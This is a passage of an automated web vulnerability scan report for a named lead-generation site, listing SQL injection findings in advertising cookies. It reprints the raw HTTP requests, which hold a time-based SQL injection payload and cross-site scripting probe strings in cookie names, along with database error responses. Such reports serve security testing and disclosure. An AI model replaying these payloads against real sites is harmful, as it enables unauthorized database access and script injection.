Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gc9e0vlbuhjmnp733jvm9c5g93; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.95. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[a08b960aNS_NO] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[a08b960aNS_NO] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960aNS_NO] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eaqig2rp4bdcn9fld0dikvddk4; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.96. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[a08b960a\0\'\"-->] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8klvivlmbdq8ir8ujdgmf6r556; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.97. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[a08b960a] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[a08b960a] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a08b960a] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D'; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
